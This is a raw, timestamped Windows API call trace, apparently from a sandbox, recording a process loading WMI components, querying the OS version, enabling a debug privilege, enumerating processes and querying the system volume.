[0563.995] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3de42c, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0563.995] __dllonexit () returned 0x7fef4b8a5c0
[0563.996] __dllonexit () returned 0x7fef4b8a644
[0563.996] __dllonexit () returned 0x7fef4b8a678
[0563.996] malloc (_Size=0x60) returned 0x3de590
[0563.996] malloc (_Size=0x18) returned 0x3cff90
[0563.996] malloc (_Size=0x18) returned 0x3dd750
[0563.996] __dllonexit () returned 0x7fef4b8a6ac
[0563.996] __dllonexit () returned 0x7fef4b8a6b8
[0563.996] __dllonexit () returned 0x7fef4b8a6ec
[0563.998] __dllonexit () returned 0x7fef4b8a720
[0563.998] __dllonexit () returned 0x7fef4b8a764
[0563.998] __dllonexit () returned 0x7fef4b8a798
[0563.998] __dllonexit () returned 0x7fef4b8a7cc
[0563.999] __dllonexit () returned 0x7fef4b8a7e0
[0563.999] __dllonexit () returned 0x7fef4b8a804
[0564.000] __dllonexit () returned 0x7fef4b8a838
[0564.000] __dllonexit () returned 0x7fef4b8a86c
[0564.000] __dllonexit () returned 0x7fef4b8a8a0
[0564.001] __dllonexit () returned 0x7fef4b8a8d4
[0564.002] __dllonexit () returned 0x7fef4b8a8e8
[0564.002] __dllonexit () returned 0x7fef4b8a910
[0564.003] __dllonexit () returned 0x7fef4b8a944
[0564.003] __dllonexit () returned 0x7fef4b8a978
[0564.004] __dllonexit () returned 0x7fef4b8a9ac
[0564.004] __dllonexit () returned 0x7fef4b8a9f0
[0564.004] __dllonexit () returned 0x7fef4b8aa34
[0564.005] __dllonexit () returned 0x7fef4b8aa68
[0564.005] malloc (_Size=0x28) returned 0x3dfe50
[0564.005] __dllonexit () returned 0x7fef4b8aa9c
[0564.006] __dllonexit () returned 0x7fef4b8aac0
[0564.006] __dllonexit () returned 0x7fef4b8ab04
[0564.007] __dllonexit () returned 0x7fef4b8ab38
[0564.007] __dllonexit () returned 0x7fef4b8ab6c
[0564.007] __dllonexit () returned 0x7fef4b8aba0
[0564.007] __dllonexit () returned 0x7fef4b8abd4
[0564.008] __dllonexit () returned 0x7fef4b8ac08
[0564.008] __dllonexit () returned 0x7fef4b8ac3c
[0564.008] __dllonexit () returned 0x7fef4b8ac70
[0564.008] __dllonexit () returned 0x7fef4b8aca4
[0564.009] __dllonexit () returned 0x7fef4b8acd8
[0564.009] __dllonexit () returned 0x7fef4b8ad0c
[0564.009] __dllonexit () returned 0x7fef4b8ad34
[0564.010] __dllonexit () returned 0x7fef4b8ad68
[0564.010] __dllonexit () returned 0x7fef4b8ad9c
[0564.010] __dllonexit () returned 0x7fef4b8adc4
[0564.010] __dllonexit () returned 0x7fef4b8ae04
[0564.011] __dllonexit () returned 0x7fef4b8ae38
[0564.011] __dllonexit () returned 0x7fef4b8ae6c
[0564.011] __dllonexit () returned 0x7fef4b8aea0
[0564.012] __dllonexit () returned 0x7fef4b8aed4
[0564.012] __dllonexit () returned 0x7fef4b8af08
[0564.012] __dllonexit () returned 0x7fef4b8af3c
[0564.012] __dllonexit () returned 0x7fef4b8af50
[0564.012] __dllonexit () returned 0x7fef4b8af84
[0564.013] __dllonexit () returned 0x7fef4b8afb8
[0564.013] __dllonexit () returned 0x7fef4b8afec
[0564.013] __dllonexit () returned 0x7fef4b8b020
[0564.013] __dllonexit () returned 0x7fef4b8b054
[0564.014] __dllonexit () returned 0x7fef4b8b088
[0564.014] __dllonexit () returned 0x7fef4b8b0bc
[0564.014] __dllonexit () returned 0x7fef4b8b0f0
[0564.015] __dllonexit () returned 0x7fef4b8b124
[0564.015] __dllonexit () returned 0x7fef4b8b158
[0564.015] __dllonexit () returned 0x7fef4b8b18c
[0564.017] __dllonexit () returned 0x7fef4b8b1c0
[0564.017] __dllonexit () returned 0x7fef4b8b210
[0564.017] __dllonexit () returned 0x7fef4b8b244
[0564.017] __dllonexit () returned 0x7fef4b8b278
[0564.018] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d0
[0564.018] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d4
[0564.018] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d8
[0564.018] __dllonexit () returned 0x7fef4b8b2ac
[0564.018] __dllonexit () returned 0x7fef4b8b2f8
[0564.018] __dllonexit () returned 0x7fef4b8b32c
[0564.019] __dllonexit () returned 0x7fef4b8b360
[0564.019] __dllonexit () returned 0x7fef4b8b394
[0564.019] __dllonexit () returned 0x7fef4b8b3c8
[0564.019] __dllonexit () returned 0x7fef4b8b3fc
[0564.020] __dllonexit () returned 0x7fef4b8b430
[0564.020] __dllonexit () returned 0x7fef4b8b464
[0564.020] __dllonexit () returned 0x7fef4b8b498
[0564.020] __dllonexit () returned 0x7fef4b8b4cc
[0564.021] __dllonexit () returned 0x7fef4b8b500
[0564.021] __dllonexit () returned 0x7fef4b8b534
[0564.021] __dllonexit () returned 0x7fef4b8b568
[0564.021] __dllonexit () returned 0x7fef4b8b59c
[0564.022] __dllonexit () returned 0x7fef4b8b5d0
[0564.022] __dllonexit () returned 0x7fef4b8b604
[0564.022] __dllonexit () returned 0x7fef4b8b618
[0564.022] __dllonexit () returned 0x7fef4b8b62c
[0564.023] __dllonexit () returned 0x7fef4b8b640
[0564.023] __dllonexit () returned 0x7fef4b8b674
[0564.023] __dllonexit () returned 0x7fef4b8b6a8
[0564.024] __dllonexit () returned 0x7fef4b8b6bc
[0564.024] __dllonexit () returned 0x7fef4b8b6d0
[0564.024] __dllonexit () returned 0x7fef4b8b6e4
[0564.024] __dllonexit () returned 0x7fef4b8b718
[0564.025] __dllonexit () returned 0x7fef4b8b740
[0564.025] __dllonexit () returned 0x7fef4b8b76c
[0564.025] __dllonexit () returned 0x7fef4b8b780
[0564.026] __dllonexit () returned 0x7fef4b8b7b4
[0564.027] __dllonexit () returned 0x7fef4b8b7e8
[0564.027] __dllonexit () returned 0x7fef4b8b838
[0564.028] __dllonexit () returned 0x7fef4b8b84c
[0564.028] malloc (_Size=0x1680) returned 0x3e5020
[0564.028] __dllonexit () returned 0x7fef4b8b860
[0564.028] __dllonexit () returned 0x7fef4b8b8ac
[0564.029] __dllonexit () returned 0x7fef4b8b8e0
[0564.029] __dllonexit () returned 0x7fef4b8b908
[0564.030] __dllonexit () returned 0x7fef4b8b93c
[0564.030] __dllonexit () returned 0x7fef4b8b970
[0564.030] __dllonexit () returned 0x7fef4b8b9a4
[0564.030] __dllonexit () returned 0x7fef4b8b9d8
[0564.030] __dllonexit () returned 0x7fef4b8ba0c
[0564.031] __dllonexit () returned 0x7fef4b8ba40
[0564.032] __dllonexit () returned 0x7fef4b8ba74
[0564.032] __dllonexit () returned 0x7fef4b8bab8
[0564.032] __dllonexit () returned 0x7fef4b8baec
[0564.032] __dllonexit () returned 0x7fef4b8bb20
[0564.033] __dllonexit () returned 0x7fef4b8bb54
[0564.033] __dllonexit () returned 0x7fef4b8bb88
[0564.033] __dllonexit () returned 0x7fef4b8bbbc
[0564.033] __dllonexit () returned 0x7fef4b8bbf0
[0564.034] __dllonexit () returned 0x7fef4b8bc24
[0564.034] __dllonexit () returned 0x7fef4b8bc58
[0564.034] __dllonexit () returned 0x7fef4b8bc8c
[0564.034] __dllonexit () returned 0x7fef4b8bcc0
[0564.036] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3e908c, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0564.037] __dllonexit () returned 0x7fef4b8bcf4
[0564.037] __dllonexit () returned 0x7fef4b8bd98
[0564.037] __dllonexit () returned 0x7fef4b8bddc
[0564.038] __dllonexit () returned 0x7fef4b8be10
[0564.038] __dllonexit () returned 0x7fef4b8be44
[0564.038] __dllonexit () returned 0x7fef4b8be78
[0564.039] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3ea28c, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0564.040] __dllonexit () returned 0x7fef4b8beac
[0564.040] __dllonexit () returned 0x7fef4b8bec0
[0564.040] __dllonexit () returned 0x7fef4b8bef4
[0564.044] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3ea42c, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0564.045] __dllonexit () returned 0x7fef4b8bf28
[0564.045] __dllonexit () returned 0x7fef4b8bfb4
[0564.047] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3ea63c, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0564.047] __dllonexit () returned 0x7fef4b8bfe8
[0564.047] __dllonexit () returned 0x7fef4b8c08c
[0564.047] __dllonexit () returned 0x7fef4b8c0c0
[0564.048] __dllonexit () returned 0x7fef4b8c0f4
[0564.049] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3eafdc, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0564.049] __dllonexit () returned 0x7fef4b8c128
[0564.049] __dllonexit () returned 0x7fef4b8c150
[0564.050] __dllonexit () returned 0x7fef4b8c184
[0564.050] __dllonexit () returned 0x7fef4b8c198
[0564.051] __dllonexit () returned 0x7fef4b8c1ac
[0564.052] __dllonexit () returned 0x7fef4b8c1c0
[0564.053] __dllonexit () returned 0x7fef4b8c1d4
[0564.054] __dllonexit () returned 0x7fef4b8c1e8
[0564.054] __dllonexit () returned 0x7fef4b8c1fc
[0564.055] __dllonexit () returned 0x7fef4b8c210
[0564.056] __dllonexit () returned 0x7fef4b8c224
[0564.057] __dllonexit () returned 0x7fef4b8c238
[0564.057] __dllonexit () returned 0x7fef4b8c24c
[0564.058] __dllonexit () returned 0x7fef4b8c260
[0564.059] __dllonexit () returned 0x7fef4b8c274
[0564.059] __dllonexit () returned 0x7fef4b8c288
[0564.060] __dllonexit () returned 0x7fef4b8c29c
[0564.060] __dllonexit () returned 0x7fef4b8c2b0
[0564.061] __dllonexit () returned 0x7fef4b8c2c4
[0564.061] __dllonexit () returned 0x7fef4b8c2d8
[0564.062] __dllonexit () returned 0x7fef4b8c2ec
[0564.062] __dllonexit () returned 0x7fef4b8c300
[0564.063] __dllonexit () returned 0x7fef4b8c314
[0564.064] __dllonexit () returned 0x7fef4b8c328
[0564.064] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3eea5c, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0564.065] __dllonexit () returned 0x7fef4b8c35c
[0564.065] __dllonexit () returned 0x7fef4b8c3e8
[0564.065] __dllonexit () returned 0x7fef4b8c42c
[0564.067] __dllonexit () returned 0x7fef4b8c454
[0564.067] __dllonexit () returned 0x7fef4b8c498
[0564.068] __dllonexit () returned 0x7fef4b8c4e4
[0564.068] __dllonexit () returned 0x7fef4b8c50c
[0564.068] __dllonexit () returned 0x7fef4b8c540
[0564.068] __dllonexit () returned 0x7fef4b8c574
[0564.069] __dllonexit () returned 0x7fef4b8c5a8
[0564.069] __dllonexit () returned 0x7fef4b8c5dc
[0564.069] __dllonexit () returned 0x7fef4b8c610
[0564.070] __dllonexit () returned 0x7fef4b8c644
[0564.070] __dllonexit () returned 0x7fef4b8c678
[0564.070] __dllonexit () returned 0x7fef4b8c6ac
[0564.071] __dllonexit () returned 0x7fef4b8c6e0
[0564.071] __dllonexit () returned 0x7fef4b8c714
[0564.071] malloc (_Size=0x60) returned 0x3f00d0
[0564.071] malloc (_Size=0x18) returned 0x3eebc0
[0564.071] malloc (_Size=0x18) returned 0x3eebe0
[0564.071] __dllonexit () returned 0x7fef4b8c740
[0564.072] __dllonexit () returned 0x7fef4b8c74c
[0564.072] GetVersionExW (in: lpVersionInformation=0xcec1e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcec1e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.072] __dllonexit () returned 0x7fef4b8c760
[0564.073] __dllonexit () returned 0x7fef4b8c774
[0564.073] malloc (_Size=0x60) returned 0x3f0140
[0564.073] malloc (_Size=0x18) returned 0x3eec00
[0564.073] malloc (_Size=0x18) returned 0x3eec20
[0564.073] __dllonexit () returned 0x7fef4b8c788
[0564.073] __dllonexit () returned 0x7fef4b8c794
[0564.074] malloc (_Size=0x60) returned 0x3f01b0
[0564.074] malloc (_Size=0x18) returned 0x3eec40
[0564.074] malloc (_Size=0x18) returned 0x3eec60
[0564.074] __dllonexit () returned 0x7fef4b8c7a8
[0564.074] malloc (_Size=0x60) returned 0x3f0220
[0564.074] malloc (_Size=0x18) returned 0x3eec80
[0564.074] malloc (_Size=0x18) returned 0x3eeca0
[0564.074] __dllonexit () returned 0x7fef4b8c7b4
[0564.074] malloc (_Size=0x60) returned 0x3f0290
[0564.074] malloc (_Size=0x18) returned 0x3eecc0
[0564.075] malloc (_Size=0x18) returned 0x3eece0
[0564.075] __dllonexit () returned 0x7fef4b8c7c0
[0564.075] malloc (_Size=0x60) returned 0x3f0330
[0564.075] malloc (_Size=0x18) returned 0x3eed00
[0564.075] malloc (_Size=0x18) returned 0x3eed20
[0564.075] __dllonexit () returned 0x7fef4b8c7cc
[0564.075] malloc (_Size=0x60) returned 0x3f03a0
[0564.075] malloc (_Size=0x18) returned 0x3eed40
[0564.076] malloc (_Size=0x18) returned 0x3eed60
[0564.076] __dllonexit () returned 0x7fef4b8c7d8
[0564.076] malloc (_Size=0x60) returned 0x3f0410
[0564.076] malloc (_Size=0x18) returned 0x3eed80
[0564.076] malloc (_Size=0x18) returned 0x3eeda0
[0564.076] __dllonexit () returned 0x7fef4b8c7e4
[0564.076] malloc (_Size=0x60) returned 0x3f0480
[0564.076] malloc (_Size=0x18) returned 0x3eedc0
[0564.076] malloc (_Size=0x18) returned 0x3eede0
[0564.076] __dllonexit () returned 0x7fef4b8c7f0
[0564.077] malloc (_Size=0x60) returned 0x3f04f0
[0564.077] malloc (_Size=0x18) returned 0x3eee00
[0564.077] malloc (_Size=0x18) returned 0x3eee20
[0564.077] __dllonexit () returned 0x7fef4b8c7fc
[0564.077] malloc (_Size=0x60) returned 0x3f0560
[0564.077] malloc (_Size=0x18) returned 0x3eee40
[0564.077] malloc (_Size=0x18) returned 0x3eee60
[0564.077] __dllonexit () returned 0x7fef4b8c808
[0564.077] malloc (_Size=0x60) returned 0x3f05d0
[0564.077] malloc (_Size=0x18) returned 0x3eee80
[0564.077] malloc (_Size=0x18) returned 0x3eeea0
[0564.077] __dllonexit () returned 0x7fef4b8c814
[0564.078] DisableThreadLibraryCalls (hLibModule=0x7fef4a50000) returned 1
[0564.078] malloc (_Size=0x28) returned 0x3efa50
[0564.078] StringFromGUID2 (in: rguid=0x7fef4b9e710*(Data1=0x3dd82d10, Data2=0xe6f1, Data3=0x11d2, Data4=([0]=0xb1, [1]=0x39, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x77, [7]=0xa1)), lpsz=0xcec170, cchMax=128 | out: lpsz="{3DD82D10-E6F1-11D2-B139-00105A1F77A1}") returned 39
[0564.078] malloc (_Size=0x30) returned 0x3ee0c0
[0564.078] malloc (_Size=0x28) returned 0x3efb10
[0564.078] StringFromGUID2 (in: rguid=0x7fef4b9e720*(Data1=0xd31b6a3f, Data2=0x9350, Data3=0x40de, Data4=([0]=0xa3, [1]=0xfc, [2]=0xa7, [3]=0xed, [4]=0xeb, [5]=0x9b, [6]=0x7c, [7]=0x63)), lpsz=0xcec170, cchMax=128 | out: lpsz="{D31B6A3F-9350-40DE-A3FC-A7EDEB9B7C63}") returned 39
[0564.078] malloc (_Size=0x30) returned 0x3ee100
[0564.079] DllGetClassObject (in: rclsid=0x201550*(Data1=0xd63a5850, Data2=0x8f16, Data3=0x11cf, Data4=([0]=0x9f, [1]=0x47, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbf, [6]=0x34, [7]=0x5c)), riid=0xcedc70*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xcecf70 | out: ppv=0xcecf70*=0x3eeec0) returned 0x0
[0564.088] GetModuleHandleW (lpModuleName="AdvAPI32") returned 0x7feff320000
[0564.088] GetProcAddress (hModule=0x7feff320000, lpProcName="EventRegister") returned 0x77c6cac0
[0564.088] GetProcAddress (hModule=0x7feff320000, lpProcName="EventUnregister") returned 0x77c53c80
[0564.088] GetProcAddress (hModule=0x7feff320000, lpProcName="EventWrite") returned 0x77c5b510
[0564.088] GetProcAddress (hModule=0x7feff320000, lpProcName="EventActivityIdControl") returned 0x77c38b60
[0564.089] GetProcAddress (hModule=0x7feff320000, lpProcName="EventWriteTransfer") returned 0x77d05370
[0564.089] GetProcAddress (hModule=0x7feff320000, lpProcName="EventEnabled") returned 0x77c5c0b0
[0564.089] EtwEventRegister (in: ProviderId=0x7fefa2a60c0, EnableCallback=0x0, CallbackContext=0x0, RegHandle=0x7fefa2c9fc0 | out: RegHandle=0x7fefa2c9fc0) returned 0x0
[0564.089] EtwEventWrite (RegHandle=0x1100010001, EventDescriptor=0x7fefa2a60b0, UserDataCount=0x5, UserData=0xcee390) returned 0x0
[0564.091] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ ()
[0564.109] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0564.128] SetLastError (dwErrCode=0x0)
[0564.129] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcee530 | out: pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcee530) returned 1
[0564.129] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9b0
[0564.129] SetLastError (dwErrCode=0x0)
[0564.129] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x1fd9b0, pcchLanguagesBuffer=0xcee530 | out: pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x1fd9b0, pcchLanguagesBuffer=0xcee530) returned 1
[0564.129] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9d0
[0564.129] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9b0 | out: hHeap=0x1c0000) returned 1
[0564.129] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x20) returned 0x226e50
[0564.129] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x226e50, pulNumLanguages=0xcee628 | out: pulNumLanguages=0xcee628) returned 1
[0564.130] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x226e50 | out: hHeap=0x1c0000) returned 1
[0564.138] SafeArrayGetElemsize (psa=0x22b160) returned 0x8
[0564.138] SafeArrayPutElement (psa=0x22b160, rgIndices=0xcede60, pv=0x227038) returned 0x0
[0564.138] SafeArrayRedim (in: psa=0x22b160, psaboundNew=0xcede78 | out: psa=0x22b160) returned 0x0
[0564.139] SafeArrayCopy (in: psa=0x22b160, ppsaOut=0xceddc0 | out: ppsaOut=0xceddc0) returned 0x0
[0564.141] malloc (_Size=0xb0) returned 0x3f1bc0
[0564.141] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x77c30000
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="RtlInitUnicodeString") returned 0x77c85280
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="RtlFreeUnicodeString") returned 0x77c85610
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="NtSetSystemEnvironmentValue") returned 0x77c829e0
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="NtQuerySystemEnvironmentValue") returned 0x77c825e0
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="NtCreateFile") returned 0x77c81860
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="NtQuerySystemInformation") returned 0x77c81670
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="NtQueryDirectoryObject") returned 0x77c82440
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="NtQueryObject") returned 0x77c81410
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtOpenDirectoryObject") returned 0x77c81890
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtQueryInformationProcess") returned 0x77c814a0
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtQueryInformationToken") returned 0x77c81520
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtOpenFile") returned 0x77c81640
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtClose") returned 0x77c81400
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtFsControlFile") returned 0x77c816a0
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtQueryVolumeInformationFile") returned 0x77c817a0
[0564.143] malloc (_Size=0x18) returned 0x3eef20
[0564.143] GetCurrentThread () returned 0xfffffffffffffffe
[0564.143] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x28, OpenAsSelf=1, TokenHandle=0xcedc18 | out: TokenHandle=0xcedc18*=0x1e8) returned 1
[0564.144] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7feff320000
[0564.144] GetProcAddress (hModule=0x7feff320000, lpProcName="LookupPrivilegeValueW") returned 0x7feff33b9e0
[0564.144] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcedbf4 | out: lpLuid=0xcedbf4*(LowPart=0x14, HighPart=0)) returned 1
[0564.146] SetLastError (dwErrCode=0x0)
[0564.146] AdjustTokenPrivileges (in: TokenHandle=0x1e8, DisableAllPrivileges=0, NewState=0xcedbf0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0564.146] GetLastError () returned 0x514
[0564.146] CloseHandle (hObject=0x1e8) returned 1
[0564.147] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x7feff600000
[0564.148] GetProcAddress (hModule=0x7feff600000, lpProcName=0xf) returned 0x7feff603f80
[0564.148] malloc (_Size=0x18) returned 0x3eef40
[0564.148] GetProcAddress (hModule=0x7feff600000, lpProcName=0x2) returned 0x7feff603480
[0564.150] GetProcAddress (hModule=0x7feff600000, lpProcName=0x1a) returned 0x7feff6076e0
[0564.150] SafeArrayPutElement (psa=0x22b1e0, rgIndices=0xcedc98, pv=0x22b118) returned 0x0
[0564.150] SafeArrayPutElement (psa=0x22b3a0, rgIndices=0xcedc98, pv=0x22b118) returned 0x0
[0564.150] GetProcAddress (hModule=0x7feff600000, lpProcName=0x6) returned 0x7feff601320
[0564.150] free (_Block=0x3eef40)
[0564.151] GetProcAddress (hModule=0x7feff600000, lpProcName=0x10) returned 0x7feff604170
[0564.151] malloc (_Size=0x8000) returned 0x3f1c80
[0564.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3f1c80, Length=0x8000, ResultLength=0x0 | out: SystemInformation=0x3f1c80, ResultLength=0x0) returned 0xc0000004
[0564.152] free (_Block=0x3f1c80)
[0564.153] malloc (_Size=0x10000) returned 0x3f1c80
[0564.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3f1c80, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x3f1c80, ResultLength=0x0) returned 0x0
[0564.154] _ui64tow (_Value=0x0, _Buffer="謰#", _Radix=10) returned="0"
[0564.157] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="0") returned 1
[0564.158] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.158] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.158] LoadLibraryA (lpLibFileName="WINBRAND.dll") returned 0x7fef72d0000
[0564.161] GetProcAddress (hModule=0x7fef72d0000, lpProcName="BrandingLoadString") returned 0x7fef72d18b0
[0564.161] BrandingLoadString () returned 0x9
[0564.172] BrandingLoadString () returned 0x16
[0564.176] BrandingLoadString () returned 0x0
[0564.183] GetWindowsDirectoryW (in: lpBuffer=0xced000, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa
[0564.183] _vsnwprintf (in: _Buffer=0xcecb30, _BufferCount=0x104, _Format="\\\\.\\%c:", _ArgList=0xcecae8 | out: _Buffer="\\\\.\\C:") returned 6
[0564.183] CreateFileW (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffffffffffff
[0564.183] GetLastError () returned 0x5
[0564.183] CreateFileW (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8
[0564.183] DeviceIoControl (in: hDevice=0x1e8, dwIoControlCode=0x2d1080, lpInBuffer=0x0, nInBufferSize=0x0, lpOutBuffer=0xcecb10, nOutBufferSize=0xc, lpBytesReturned=0xcecb20, lpOverlapped=0x0 | out: lpOutBuffer=0xcecb10*, lpBytesReturned=0xcecb20*=0xc, lpOverlapped=0x0) returned 1
[0564.184] _vsnwprintf (in: _Buffer=0xced210, _BufferCount=0x103, _Format="\\Device\\Harddisk%ld\\Partition%ld", _ArgList=0xcecae8 | out: _Buffer="\\Device\\Harddisk0\\Partition1") returned 28
[0564.184] CloseHandle (hObject=0x1e8) returned 1
[0564.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0
[0564.200] CloseHandle (hObject=0x0) returned 0
[0564.201] _ui64tow (_Value=0x4, _Buffer="0", _Radix=10) returned="4"
[0564.205] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="4") returned 1
[0564.206] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.206] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.231] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0
[0564.231] CloseHandle (hObject=0x0) returned 0
[0564.232] _ui64tow (_Value=0x110, _Buffer="4", _Radix=10) returned="272"
